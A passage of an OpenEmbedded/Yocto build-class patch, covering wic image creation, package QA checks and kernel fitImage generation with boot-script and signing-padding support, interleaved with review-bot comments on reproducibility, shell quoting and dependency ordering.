do_image_cpio[cleandirs] += "${WORKDIR}/cpio_append"
IMAGE_CMD_cpio () {
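Review bot: `--format=posix` on the new IMAGE_CMD_tar line switches to pax headers, which as far as I know let GNU tar record atime and ctime for each member, so two builds of the same rootfs may still differ byte for byte. If the aim of `--sort=name` is a reproducible archive, consider also passing `--pax-option=delete=atime,delete=ctime`, after confirming the host tar supports it. A one-line comment above the assignment saying why the sort and format flags are there would help the next reader.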
@@ -240,7 +240,7 @@ EXTRA_IMAGECMD_jffs2 ?= "--pad ${JFFS2_ENDIANNESS} --eraseblock=${JFFS2_ERASEBLO
EXTRA_IMAGECMD_ext2 ?= "-i 4096"
EXTRA_IMAGECMD_ext3 ?= "-i 4096"
EXTRA_IMAGECMD_ext4 ?= "-i 4096"
-EXTRA_IMAGECMD_btrfs ?= "-n 4096"
+EXTRA_IMAGECMD_btrfs ?= "-n 4096 --shrink"
EXTRA_IMAGECMD_f2fs ?= ""
do_image_cpio[depends] += "cpio-native:do_populate_sysroot"
diff --git a/meta/classes/image_types_wic.bbclass b/meta/classes/image_types_wic.bbclass
index 196c86814e..ae00acc5ea 100644
--- a/meta/classes/image_types_wic.bbclass
+++ b/meta/classes/image_types_wic.bbclass
@@ -3,9 +3,9 @@
WICVARS ?= "\
BBLAYERS IMGDEPLOYDIR DEPLOY_DIR_IMAGE FAKEROOTCMD IMAGE_BASENAME IMAGE_BOOT_FILES \
IMAGE_LINK_NAME IMAGE_ROOTFS INITRAMFS_FSTYPES INITRD INITRD_LIVE ISODIR RECIPE_SYSROOT_NATIVE \
- ROOTFS_SIZE STAGING_DATADIR STAGING_DIR STAGING_LIBDIR TARGET_SYS \
+ ROOTFS_SIZE STAGING_DATADIR STAGING_DIR STAGING_LIBDIR TARGET_SYS HOSTTOOLS_DIR \
KERNEL_IMAGETYPE MACHINE INITRAMFS_IMAGE INITRAMFS_IMAGE_BUNDLE INITRAMFS_LINK_NAME APPEND \
- ASSUME_PROVIDED"
+ ASSUME_PROVIDED PSEUDO_IGNORE_PATHS"
inherit ${@bb.utils.contains('INITRAMFS_IMAGE_BUNDLE', '1', 'kernel-artifact-names', '', d)}
@@ -29,17 +29,24 @@ WIC_CREATE_EXTRA_ARGS ?= ""
IMAGE_CMD_wic () {
out="${IMGDEPLOYDIR}/${IMAGE_NAME}"
build_wic="${WORKDIR}/build-wic"
+ tmp_wic="${WORKDIR}/tmp-wic"
wks="${WKS_FULL_PATH}"
+ if [ -e "$tmp_wic" ]; then
+ # Ensure we don't have any junk leftover from a previously interrupted
+ # do_image_wic execution
+ rm -rf "$tmp_wic"
+ fi
if [ -z "$wks" ]; then
bbfatal "No kickstart files from WKS_FILES were found: ${WKS_FILES}. Please set WKS_FILE or WKS_FILES appropriately."
fi
-
- BUILDDIR="${TOPDIR}" wic create "$wks" --vars "${STAGING_DIR}/${MACHINE}/imgdata/" -e "${IMAGE_BASENAME}" -o "$build_wic/" ${WIC_CREATE_EXTRA_ARGS}
+ BUILDDIR="${TOPDIR}" PSEUDO_UNLOAD=1 wic create "$wks" --vars "${STAGING_DIR}/${MACHINE}/imgdata/" -e "${IMAGE_BASENAME}" -o "$build_wic/" -w "$tmp_wic" ${WIC_CREATE_EXTRA_ARGS}
mv "$build_wic/$(basename "${wks%.wks}")"*.direct "$out${IMAGE_NAME_SUFFIX}.wic"
}
IMAGE_CMD_wic[vardepsexclude] = "WKS_FULL_PATH WKS_FILES TOPDIR"
do_image_wic[cleandirs] = "${WORKDIR}/build-wic"
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/build-wic"
+
# Rebuild when the wks file or vars in WICVARS change
USING_WIC = "${@bb.utils.contains_any('IMAGE_FSTYPES', 'wic ' + ' '.join('wic.%s' % c for c in '${CONVERSIONTYPES}'.split()), '1', '', d)}"
WKS_FILE_CHECKSUM = "${@'${WKS_FULL_PATH}:%s' % os.path.exists('${WKS_FULL_PATH}') if '${USING_WIC}' else ''}"
@@ -87,6 +94,10 @@ python do_write_wks_template () {
bb.utils.copyfile(wks_file, "%s/%s" % (depdir, basename + '-' + os.path.basename(wks_file)))
}
+do_flush_pseudodb() {
+ ${FAKEROOTENV} ${FAKEROOTCMD} -S
+}
+
python () {
if d.getVar('USING_WIC'):
wks_file_u = d.getVar('WKS_FULL_PATH', False)
@@ -140,6 +151,7 @@ python do_rootfs_wicenv () {
depdir = d.getVar('IMGDEPLOYDIR')
bb.utils.copyfile(os.path.join(outdir, basename) + '.env', os.path.join(depdir, basename) + '.env')
}
+addtask do_flush_pseudodb after do_rootfs before do_image do_image_qa
addtask do_rootfs_wicenv after do_image before do_image_wic
do_rootfs_wicenv[vardeps] += "${WICVARS}"
do_rootfs_wicenv[prefuncs] = 'set_image_size'
diff --git a/meta/classes/insane.bbclass b/meta/classes/insane.bbclass
index b5c6b2186f..d6da53252f 100644
--- a/meta/classes/insane.bbclass
+++ b/meta/classes/insane.bbclass
@@ -174,7 +174,7 @@ def package_qa_check_useless_rpaths(file, name, d, elf, messages):
if rpath_eq(rpath, libdir) or rpath_eq(rpath, base_libdir):
# The dynamic linker searches both these places anyway. There is no point in
# looking there again.
- package_qa_add_message(messages, "useless-rpaths", "%s: %s contains probably-redundant RPATH %s" % (name, package_qa_clean_path(file, d), rpath))
+ package_qa_add_message(messages, "useless-rpaths", "%s: %s contains probably-redundant RPATH %s" % (name, package_qa_clean_path(file, d, name), rpath))
QAPATHTEST[dev-so] = "package_qa_check_dev"
def package_qa_check_dev(path, name, d, elf, messages):
@@ -183,8 +183,8 @@ def package_qa_check_dev(path, name, d, elf, messages):
"""
if not name.endswith("-dev") and not name.endswith("-dbg") and not name.endswith("-ptest") and not name.startswith("nativesdk-") and path.endswith(".so") and os.path.islink(path):
- package_qa_add_message(messages, "dev-so", "non -dev/-dbg/nativesdk- package contains symlink .so: %s path '%s'" % \
- (name, package_qa_clean_path(path,d)))
+ package_qa_add_message(messages, "dev-so", "non -dev/-dbg/nativesdk- package %s contains symlink .so '%s'" % \
+ (name, package_qa_clean_path(path, d, name)))
QAPATHTEST[dev-elf] = "package_qa_check_dev_elf"
def package_qa_check_dev_elf(path, name, d, elf, messages):
@@ -194,8 +194,8 @@ def package_qa_check_dev_elf(path, name, d, elf, messages):
install link-time .so files that are linker scripts.
"""
if name.endswith("-dev") and path.endswith(".so") and not os.path.islink(path) and elf:
- package_qa_add_message(messages, "dev-elf", "-dev package contains non-symlink .so: %s path '%s'" % \
- (name, package_qa_clean_path(path,d)))
+ package_qa_add_message(messages, "dev-elf", "-dev package %s contains non-symlink .so '%s'" % \
+ (name, package_qa_clean_path(path, d, name)))
QAPATHTEST[staticdev] = "package_qa_check_staticdev"
def package_qa_check_staticdev(path, name, d, elf, messages):
@@ -208,7 +208,7 @@ def package_qa_check_staticdev(path, name, d, elf, messages):
if not name.endswith("-pic") and not name.endswith("-staticdev") and not name.endswith("-ptest") and path.endswith(".a") and not path.endswith("_nonshared.a") and not '/usr/lib/debug-static/' in path and not '/.debug-static/' in path:
package_qa_add_message(messages, "staticdev", "non -staticdev package contains static .a library: %s path '%s'" % \
- (name, package_qa_clean_path(path,d)))
+ (name, package_qa_clean_path(path,d, name)))
QAPATHTEST[mime] = "package_qa_check_mime"
def package_qa_check_mime(path, name, d, elf, messages):
@@ -452,12 +452,14 @@ def package_qa_check_buildpaths(path, name, d, elf, messages):
"""
Check for build paths inside target files and error if not found in the whitelist
"""
+ import stat
# Ignore .debug files, not interesting
if path.find(".debug") != -1:
return
- # Ignore symlinks
- if os.path.islink(path):
+ # Ignore symlinks/devs/fifos
+ mode = os.lstat(path).st_mode
+ if stat.S_ISLNK(mode) or stat.S_ISBLK(mode) or stat.S_ISFIFO(mode) or stat.S_ISCHR(mode) or stat.S_ISSOCK(mode):
return
tmpdir = bytes(d.getVar('TMPDIR'), encoding="utf-8")
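Review bot: The new type test in package_qa_check_buildpaths lists the file types to skip one by one, so any type not named there still reaches the rest of the function, which lies outside this hunk. If only regular files are meant to be scanned, `if not stat.S_ISREG(mode): return` states that directly and cannot miss a type; whether directories are ever passed in is not visible here, so confirm against the caller first. The `os.lstat(path)` call can also raise if the file disappears before the check, which the old `os.path.islink` did not.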
@@ -945,7 +947,7 @@ def package_qa_check_host_user(path, name, d, elf, messages):
dest = d.getVar('PKGDEST')
pn = d.getVar('PN')
- home = os.path.join(dest, 'home')
+ home = os.path.join(dest, name, 'home')
if path == home or path.startswith(home + os.sep):
return
@@ -1012,26 +1014,6 @@ python do_package_qa () {
logdir = d.getVar('T')
pn = d.getVar('PN')
- # Check the compile log for host contamination
- compilelog = os.path.join(logdir,"log.do_compile")
-
- if os.path.exists(compilelog):
- statement = "grep -e 'CROSS COMPILE Badness:' -e 'is unsafe for cross-compilation' %s > /dev/null" % compilelog
- if subprocess.call(statement, shell=True) == 0:
- msg = "%s: The compile log indicates that host include and/or library paths were used.\n \
- Please check the log '%s' for more information." % (pn, compilelog)
- package_qa_handle_error("compile-host-path", msg, d)
-
- # Check the install log for host contamination
- installlog = os.path.join(logdir,"log.do_install")
-
- if os.path.exists(installlog):
- statement = "grep -e 'CROSS COMPILE Badness:' -e 'is unsafe for cross-compilation' %s > /dev/null" % installlog
- if subprocess.call(statement, shell=True) == 0:
- msg = "%s: The install log indicates that host include and/or library paths were used.\n \
- Please check the log '%s' for more information." % (pn, installlog)
- package_qa_handle_error("install-host-path", msg, d)
-
# Scan the packages...
pkgdest = d.getVar('PKGDEST')
packages = set((d.getVar('PACKAGES') or '').split())
@@ -1210,7 +1192,7 @@ python do_qa_configure() {
if bb.data.inherits_class('autotools', d) and not skip_configure_unsafe:
bb.note("Checking autotools environment for common misconfiguration")
for root, dirs, files in os.walk(workdir):
- statement = "grep -q -F -e 'CROSS COMPILE Badness:' -e 'is unsafe for cross-compilation' %s" % \
+ statement = "grep -q -F -e 'is unsafe for cross-compilation' %s" % \
os.path.join(root,"config.log")
if "config.log" in files:
if subprocess.call(statement, shell=True) == 0:
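Review bot: The `statement` string kept by this hunk interpolates `os.path.join(root,"config.log")` into a command that runs with `shell=True`, so a directory name in the unpacked source tree containing spaces or shell metacharacters is interpreted by the shell rather than passed to grep as one argument. Passing an argument list avoids the shell entirely: `subprocess.call(['grep', '-q', '-F', '-e', 'is unsafe for cross-compilation', os.path.join(root, 'config.log')])`. The string is also built for every directory before the `"config.log" in files` test, so it could move inside that branch. do_qa_configure starts and ends outside the hunk.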
diff --git a/meta/classes/kernel-arch.bbclass b/meta/classes/kernel-arch.bbclass
index 07ec242e63..4cd08b96fb 100644
--- a/meta/classes/kernel-arch.bbclass
+++ b/meta/classes/kernel-arch.bbclass
@@ -61,8 +61,8 @@ HOST_LD_KERNEL_ARCH ?= "${TARGET_LD_KERNEL_ARCH}"
TARGET_AR_KERNEL_ARCH ?= ""
HOST_AR_KERNEL_ARCH ?= "${TARGET_AR_KERNEL_ARCH}"
-KERNEL_CC = "${CCACHE}${HOST_PREFIX}gcc ${HOST_CC_KERNEL_ARCH} -fuse-ld=bfd ${DEBUG_PREFIX_MAP} -fdebug-prefix-map=${STAGING_KERNEL_DIR}=${KERNEL_SRC_PATH}"
+KERNEL_CC = "${CCACHE}${HOST_PREFIX}gcc ${HOST_CC_KERNEL_ARCH} -fuse-ld=bfd ${DEBUG_PREFIX_MAP} -fdebug-prefix-map=${STAGING_KERNEL_DIR}=${KERNEL_SRC_PATH} -fdebug-prefix-map=${STAGING_KERNEL_BUILDDIR}=${KERNEL_SRC_PATH}"
KERNEL_LD = "${CCACHE}${HOST_PREFIX}ld.bfd ${HOST_LD_KERNEL_ARCH}"
KERNEL_AR = "${CCACHE}${HOST_PREFIX}ar ${HOST_AR_KERNEL_ARCH}"
-TOOLCHAIN = "gcc"
+TOOLCHAIN ?= "gcc"
diff --git a/meta/classes/kernel-devicetree.bbclass b/meta/classes/kernel-devicetree.bbclass
index 81dda8003f..27a4905ac6 100644
--- a/meta/classes/kernel-devicetree.bbclass
+++ b/meta/classes/kernel-devicetree.bbclass
@@ -1,14 +1,20 @@
# Support for device tree generation
-PACKAGES_append = " \
- ${KERNEL_PACKAGE_NAME}-devicetree \
- ${@[d.getVar('KERNEL_PACKAGE_NAME') + '-image-zimage-bundle', ''][d.getVar('KERNEL_DEVICETREE_BUNDLE') != '1']} \
-"
+python () {
+ if not bb.data.inherits_class('nopackages', d):
+ d.appendVar("PACKAGES", " ${KERNEL_PACKAGE_NAME}-devicetree")
+ if d.getVar('KERNEL_DEVICETREE_BUNDLE') == '1':
+ d.appendVar("PACKAGES", " ${KERNEL_PACKAGE_NAME}-image-zimage-bundle")
+}
+
FILES_${KERNEL_PACKAGE_NAME}-devicetree = "/${KERNEL_IMAGEDEST}/*.dtb /${KERNEL_IMAGEDEST}/*.dtbo"
FILES_${KERNEL_PACKAGE_NAME}-image-zimage-bundle = "/${KERNEL_IMAGEDEST}/zImage-*.dtb.bin"
# Generate kernel+devicetree bundle
KERNEL_DEVICETREE_BUNDLE ?= "0"
+# dtc flags passed via DTC_FLAGS env variable
+KERNEL_DTC_FLAGS ?= ""
+
normalize_dtb () {
dtb="$1"
if echo $dtb | grep -q '/dts/'; then
@@ -50,6 +56,10 @@ do_configure_append() {
}
do_compile_append() {
+ if [ -n "${KERNEL_DTC_FLAGS}" ]; then
+ export DTC_FLAGS="${KERNEL_DTC_FLAGS}"
+ fi
+
for dtbf in ${KERNEL_DEVICETREE}; do
dtb=`normalize_dtb "$dtbf"`
oe_runmake $dtb CC="${KERNEL_CC} $cc_extra " LD="${KERNEL_LD}" ${KERNEL_EXTRA_ARGS}
diff --git a/meta/classes/kernel-fitimage.bbclass b/meta/classes/kernel-fitimage.bbclass
index 72b05ff8d1..7c7bcd3fc0 100644
--- a/meta/classes/kernel-fitimage.bbclass
+++ b/meta/classes/kernel-fitimage.bbclass
@@ -1,5 +1,7 @@
inherit kernel-uboot kernel-artifact-names uboot-sign
+KERNEL_IMAGETYPE_REPLACEMENT = ""
+
python __anonymous () {
kerneltypes = d.getVar('KERNEL_IMAGETYPES') or ""
if 'fitImage' in kerneltypes.split():
@@ -21,6 +23,8 @@ python __anonymous () {
else:
replacementtype = "zImage"
+ d.setVar("KERNEL_IMAGETYPE_REPLACEMENT", replacementtype)
+
# Override KERNEL_IMAGETYPE_FOR_MAKE variable, which is internal
# to kernel.bbclass . We have to override it, since we pack zImage
# (at least for now) into the fitImage .
@@ -45,6 +49,8 @@ python __anonymous () {
if d.getVar('UBOOT_SIGN_ENABLE') == "1" and d.getVar('UBOOT_DTB_BINARY'):
uboot_pn = d.getVar('PREFERRED_PROVIDER_u-boot') or 'u-boot'
d.appendVarFlag('do_assemble_fitimage', 'depends', ' %s:do_populate_sysroot' % uboot_pn)
+ if d.getVar('INITRAMFS_IMAGE_BUNDLE') == "1":
+ d.appendVarFlag('do_assemble_fitimage_initramfs', 'depends', ' %s:do_populate_sysroot' % uboot_pn)
}
# Options for the device tree compiler passed to mkimage '-D' feature:
@@ -56,6 +62,12 @@ FIT_HASH_ALG ?= "sha256"
# fitImage Signature Algo
FIT_SIGN_ALG ?= "rsa2048"
+# fitImage Padding Algo
+FIT_PAD_ALG ?= "pkcs-1.5"
+
+# Arguments passed to mkimage for signing
+UBOOT_MKIMAGE_SIGN_ARGS ?= ""
+
#
# Emit the fitImage ITS header
#
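Review bot: The two new variables are documented only by restating their names, and both affect how the image is signed. I would expand the comments to say what FIT_PAD_ALG accepts and where it ends up, e.g. `# Signature padding written to the ITS "padding" property; U-Boot accepts "pkcs-1.5" or "pss"`. For UBOOT_MKIMAGE_SIGN_ARGS, something like `# Extra arguments appended unquoted (word-split) to the signing uboot-mkimage call` would do. The bootloader that verifies the image has to support the padding chosen here, which is worth a sentence as well.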
@@ -124,7 +136,7 @@ fitimage_emit_section_kernel() {
fi
cat << EOF >> ${1}
- kernel@${2} {
+ kernel-${2} {
description = "Linux kernel";
data = /incbin/("${3}");
type = "kernel";
@@ -133,7 +145,7 @@ fitimage_emit_section_kernel() {
compression = "${4}";
load = <${UBOOT_LOADADDRESS}>;
entry = <${ENTRYPOINT}>;
- hash@1 {
+ hash-1 {
algo = "${kernel_csum}";
};
};
@@ -160,14 +172,14 @@ fitimage_emit_section_dtb() {
dtb_loadline="load = <${UBOOT_DTB_LOADADDRESS}>;"
fi
cat << EOF >> ${1}
- fdt@${2} {
+ fdt-${2} {
description = "Flattened Device Tree blob";
data = /incbin/("${3}");
type = "flat_dt";
arch = "${UBOOT_ARCH}";
compression = "none";
${dtb_loadline}
- hash@1 {
+ hash-1 {
algo = "${dtb_csum}";
};
};
@@ -175,6 +187,43 @@ EOF
}
#
+# Emit the fitImage ITS u-boot script section
+#
+# $1 ... .its filename
+# $2 ... Image counter
+# $3 ... Path to boot script image
+fitimage_emit_section_boot_script() {
+
+ bootscr_csum="${FIT_HASH_ALG}"
+ bootscr_sign_algo="${FIT_SIGN_ALG}"
+ bootscr_sign_keyname="${UBOOT_SIGN_IMG_KEYNAME}"
+
+ cat << EOF >> $1
+ bootscr-$2 {
+ description = "U-boot script";
+ data = /incbin/("$3");
+ type = "script";
+ arch = "${UBOOT_ARCH}";
+ compression = "none";
+ hash-1 {
+ algo = "$bootscr_csum";
+ };
+ };
+EOF
+
+ if [ "${UBOOT_SIGN_ENABLE}" = "1" -a "${FIT_SIGN_INDIVIDUAL}" = "1" -a -n "$bootscr_sign_keyname" ] ; then
+ sed -i '$ d' $1
+ cat << EOF >> $1
+ signature-1 {
+ algo = "$bootscr_csum,$bootscr_sign_algo";
+ key-name-hint = "$bootscr_sign_keyname";
+ };
+ };
+EOF
+ fi
+}
+
+#
# Emit the fitImage ITS setup section
#
# $1 ... .its filename
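Review bot: The `signature-1` node emitted for the boot script carries `algo` and `key-name-hint` but no `padding` property, while the configuration signature node in this same commit gains `padding = "${conf_padding_algo}";`. With FIT_PAD_ALG set to something other than the default, the script's individual signature would presumably be described with a different padding than the configuration's. Adding `padding = "${FIT_PAD_ALG}";` to the node keeps the two consistent. FIT_SIGN_INDIVIDUAL and UBOOT_SIGN_IMG_KEYNAME get no default in the hunks shown, and `$1` is unquoted in `sed -i '$ d' $1` and in both `cat << EOF >> $1` redirects.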
@@ -185,7 +234,7 @@ fitimage_emit_section_setup() {
setup_csum="${FIT_HASH_ALG}"
cat << EOF >> ${1}
- setup@${2} {
+ setup-${2} {
description = "Linux setup.bin";
data = /incbin/("${3}");
type = "x86_setup";
@@ -194,7 +243,7 @@ fitimage_emit_section_setup() {
compression = "none";
load = <0x00090000>;
entry = <0x00090000>;
- hash@1 {
+ hash-1 {
algo = "${setup_csum}";
};
};
@@ -221,7 +270,7 @@ fitimage_emit_section_ramdisk() {
fi
cat << EOF >> ${1}
- ramdisk@${2} {
+ ramdisk-${2} {
description = "${INITRAMFS_IMAGE}";
data = /incbin/("${3}");
type = "ramdisk";
@@ -230,7 +279,7 @@ fitimage_emit_section_ramdisk() {
compression = "none";
${ramdisk_loadline}
${ramdisk_entryline}
- hash@1 {
+ hash-1 {
algo = "${ramdisk_csum}";
};
};
@@ -244,13 +293,15 @@ EOF
# $2 ... Linux kernel ID
# $3 ... DTB image name
# $4 ... ramdisk ID
-# $5 ... config ID
-# $6 ... default flag
+# $5 ... u-boot script ID
+# $6 ... config ID
+# $7 ... default flag
fitimage_emit_section_config() {
conf_csum="${FIT_HASH_ALG}"
conf_sign_algo="${FIT_SIGN_ALG}"
- if [ -n "${UBOOT_SIGN_ENABLE}" ] ; then
+ conf_padding_algo="${FIT_PAD_ALG}"
+ if [ "${UBOOT_SIGN_ENABLE}" = "1" ] ; then
conf_sign_keyname="${UBOOT_SIGN_KEYNAME}"
fi
@@ -260,45 +311,53 @@ fitimage_emit_section_config() {
kernel_line=""
fdt_line=""
ramdisk_line=""
+ bootscr_line=""
setup_line=""
default_line=""
if [ -n "${2}" ]; then
conf_desc="Linux kernel"
sep=", "
- kernel_line="kernel = \"kernel@${2}\";"
+ kernel_line="kernel = \"kernel-${2}\";"
fi
if [ -n "${3}" ]; then
conf_desc="${conf_desc}${sep}FDT blob"
sep=", "
- fdt_line="fdt = \"fdt@${3}\";"
+ fdt_line="fdt = \"fdt-${3}\";"
fi
if [ -n "${4}" ]; then
conf_desc="${conf_desc}${sep}ramdisk"
sep=", "
- ramdisk_line="ramdisk = \"ramdisk@${4}\";"
+ ramdisk_line="ramdisk = \"ramdisk-${4}\";"
fi
if [ -n "${5}" ]; then
+ conf_desc="${conf_desc}${sep}u-boot script"
+ sep=", "
+ bootscr_line="bootscr = \"bootscr-${5}\";"
+ fi
+
+ if [ -n "${6}" ]; then
conf_desc="${conf_desc}${sep}setup"
- setup_line="setup = \"setup@${5}\";"
+ setup_line="setup = \"setup-${6}\";"
fi
- if [ "${6}" = "1" ]; then
- default_line="default = \"conf@${3}\";"
+ if [ "${7}" = "1" ]; then
+ default_line="default = \"conf-${3}\";"
fi
cat << EOF >> ${1}
${default_line}
- conf@${3} {
- description = "${6} ${conf_desc}";
+ conf-${3} {
+ description = "${7} ${conf_desc}";
${kernel_line}
${fdt_line}
${ramdisk_line}
+ ${bootscr_line}
${setup_line}
- hash@1 {
+ hash-1 {
algo = "${conf_csum}";
};
EOF
@@ -324,15 +383,21 @@ EOF
fi
if [ -n "${5}" ]; then
+ sign_line="${sign_line}${sep}\"bootscr\""
+ sep=", "
+ fi
+
+ if [ -n "${6}" ]; then
sign_line="${sign_line}${sep}\"setup\""
fi
sign_line="${sign_line};"
cat << EOF >> ${1}
- signature@1 {
+ signature-1 {
algo = "${conf_csum},${conf_sign_algo}";
key-name-hint = "${conf_sign_keyname}";
+ padding = "${conf_padding_algo}";
${sign_line}
};
EOF
@@ -355,6 +420,7 @@ fitimage_assemble() {
DTBS=""
ramdiskcount=${3}
setupcount=""
+ bootscr_id=""
rm -f ${1} arch/${ARCH}/boot/${2}
fitimage_emit_fit_header ${1}
@@ -365,7 +431,7 @@ fitimage_assemble() {
fitimage_emit_section_maint ${1} imagestart
uboot_prep_kimage
- fitimage_emit_section_kernel ${1} "${kernelcount}" linux.bin "${linux_comp}"
+ fitimage_emit_section_kernel $1 $kernelcount linux.bin "$linux_comp"
#
# Step 2: Prepare a DTB image section
@@ -399,7 +465,21 @@ fitimage_assemble() {
fi
#
- # Step 3: Prepare a setup section. (For x86)
+ # Step 3: Prepare a u-boot script section
+ #
+
+ if [ -n "${UBOOT_ENV}" ] && [ -d "${STAGING_DIR_HOST}/boot" ]; then
+ if [ -e "${STAGING_DIR_HOST}/boot/${UBOOT_ENV_BINARY}" ]; then
+ cp ${STAGING_DIR_HOST}/boot/${UBOOT_ENV_BINARY} ${B}
+ bootscr_id="${UBOOT_ENV_BINARY}"
+ fitimage_emit_section_boot_script ${1} "${bootscr_id}" ${UBOOT_ENV_BINARY}
+ else
+ bbwarn "${STAGING_DIR_HOST}/boot/${UBOOT_ENV_BINARY} not found."
+ fi
+ fi
+
+ #
+ # Step 4: Prepare a setup section. (For x86)
#
if [ -e arch/${ARCH}/boot/setup.bin ]; then
setupcount=1
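Review bot: Step 3 includes the boot script only if `${STAGING_DIR_HOST}/boot/${UBOOT_ENV_BINARY}` already exists, but the only visible dependency on the u-boot recipe's do_populate_sysroot is added when UBOOT_SIGN_ENABLE is "1" and UBOOT_DTB_BINARY is set. With UBOOT_ENV set and signing off, whether the script lands in the fitImage then appears to depend on task ordering. A missing file produces just a `bbwarn`, and nothing at all when the `boot` directory is absent. I would add the same `depends` entry whenever UBOOT_ENV is set and use `bbfatal` for the missing-file case, so an image expected to carry a boot script cannot be built without one. fitimage_assemble starts and ends outside the hunk.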
@@ -407,9 +487,9 @@ fitimage_assemble() {
fi
#
- # Step 4: Prepare a ramdisk section.
+ # Step 5: Prepare a ramdisk section.
#
- if [ "x${ramdiskcount}" = "x1" ] ; then
+ if [ "x${ramdiskcount}" = "x1" ] && [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ]; then
# Find and use the first initramfs image archive type we find
for img in cpio.lz4 cpio.lzo cpio.lzma cpio.xz cpio.gz ext2.gz cpio; do
initramfs_path="${DEPLOY_DIR_IMAGE}/${INITRAMFS_IMAGE_NAME}.${img}"
@@ -430,7 +510,7 @@ fitimage_assemble() {
fi
#
- # Step 5: Prepare a configurations section
+ # Step 6: Prepare a configurations section
#
fitimage_emit_section_maint ${1} confstart
@@ -439,9 +519,9 @@ fitimage_assemble() {
for DTB in ${DTBS}; do
dtb_ext=${DTB##*.}
if [ "${dtb_ext}" = "dtbo" ]; then
- fitimage_emit_section_config ${1} "" "${DTB}" "" "" "`expr ${i} = ${dtbcount}`"
+ fitimage_emit_section_config ${1} "" "${DTB}" "" "${bootscr_id}" "" "`expr ${i} = ${dtbcount}`"
else
- fitimage_emit_section_config ${1} "${kernelcount}" "${DTB}" "${ramdiskcount}" "${setupcount}" "`expr ${i} = ${dtbcount}`"
+ fitimage_emit_section_config ${1} "${kernelcount}" "${DTB}" "${ramdiskcount}" "${bootscr_id}" "${setupcount}" "`expr ${i} = ${dtbcount}`"
fi
i=`expr ${i} + 1`
done
@@ -452,7 +532,7 @@ fitimage_assemble() {
fitimage_emit_section_maint ${1} fitend
#
- # Step 6: Assemble the image
+ # Step 7: Assemble the image
#
uboot-mkimage \
${@'-D "${UBOOT_MKIMAGE_DTCOPTS}"' if len('${UBOOT_MKIMAGE_DTCOPTS}') else ''} \
@@ -460,7 +540,7 @@ fitimage_assemble() {
arch/${ARCH}/boot/${2}
#
- # Step 7: Sign the image and add public key to U-Boot dtb
+ # Step 8: Sign the image and add public key to U-Boot dtb
#
if [ "x${UBOOT_SIGN_ENABLE}" = "x1" ] ; then
add_key_to_u_boot=""
@@ -474,7 +554,8 @@ fitimage_assemble() {
${@'-D "${UBOOT_MKIMAGE_DTCOPTS}"' if len('${UBOOT_MKIMAGE_DTCOPTS}') else ''} \
-F -k "${UBOOT_SIGN_KEYDIR}" \
$add_key_to_u_boot \
- -r arch/${ARCH}/boot/${2}
+ -r arch/${ARCH}/boot/${2} \
+ ${UBOOT_MKIMAGE_SIGN_ARGS}
fi
}
@@ -491,7 +572,11 @@ do_assemble_fitimage_initramfs() {
if echo ${KERNEL_IMAGETYPES} | grep -wq "fitImage" && \
test -n "${INITRAMFS_IMAGE}" ; then
cd ${B}
- fitimage_assemble fit-image-${INITRAMFS_IMAGE}.its fitImage-${INITRAMFS_IMAGE} 1
+ if [ "${INITRAMFS_IMAGE_BUNDLE}" = "1" ]; then
+ fitimage_assemble fit-image-${INITRAMFS_IMAGE}.its fitImage ""
+ else
+ fitimage_assemble fit-image-${INITRAMFS_IMAGE}.its fitImage-${INITRAMFS_IMAGE} 1
+ fi
fi
}
@@ -502,22 +587,32 @@ kernel_do_deploy[vardepsexclude] = "DATETIME"
kernel_do_deploy_append() {
# Update deploy directory
if echo ${KERNEL_IMAGETYPES} | grep -wq "fitImage"; then
- echo "Copying fit-image.its source file..."
- install -m 0644 ${B}/fit-image.its "$deployDir/fitImage-its-${KERNEL_FIT_NAME}.its"
- ln -snf fitImage-its-${KERNEL_FIT_NAME}.its "$deployDir/fitImage-its-${KERNEL_FIT_LINK_NAME}"
+ if [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ]; then
+ echo "Copying fit-image.its source file..."
+ install -m 0644 ${B}/fit-image.its "$deployDir/fitImage-its-${KERNEL_FIT_NAME}.its"
+ if [ -n "${KERNEL_FIT_LINK_NAME}" ] ; then
+ ln -snf fitImage-its-${KERNEL_FIT_NAME}.its "$deployDir/fitImage-its-${KERNEL_FIT_LINK_NAME}"
+ fi
- echo "Copying linux.bin file..."
- install -m 0644 ${B}/linux.bin $deployDir/fitImage-linux.bin-${KERNEL_FIT_NAME}.bin
- ln -snf fitImage-linux.bin-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-linux.bin-${KERNEL_FIT_LINK_NAME}"
+ echo "Copying linux.bin file..."
+ install -m 0644 ${B}/linux.bin $deployDir/fitImage-linux.bin-${KERNEL_FIT_NAME}.bin
+ if [ -n "${KERNEL_FIT_LINK_NAME}" ] ; then
+ ln -snf fitImage-linux.bin-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-linux.bin-${KERNEL_FIT_LINK_NAME}"
+ fi
+ fi
if [ -n "${INITRAMFS_IMAGE}" ]; then
echo "Copying fit-image-${INITRAMFS_IMAGE}.its source file..."
install -m 0644 ${B}/fit-image-${INITRAMFS_IMAGE}.its "$deployDir/fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.its"
ln -snf fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.its "$deployDir/fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}"
- echo "Copying fitImage-${INITRAMFS_IMAGE} file..."
- install -m 0644 ${B}/arch/${ARCH}/boot/fitImage-${INITRAMFS_IMAGE} "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin"
- ln -snf fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}"
+ if [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ]; then
+ echo "Copying fitImage-${INITRAMFS_IMAGE} file..."
+ install -m 0644 ${B}/arch/${ARCH}/boot/fitImage-${INITRAMFS_IMAGE} "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin"
+ if [ -n "${KERNEL_FIT_LINK_NAME}" ] ; then
+ ln -snf fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}"
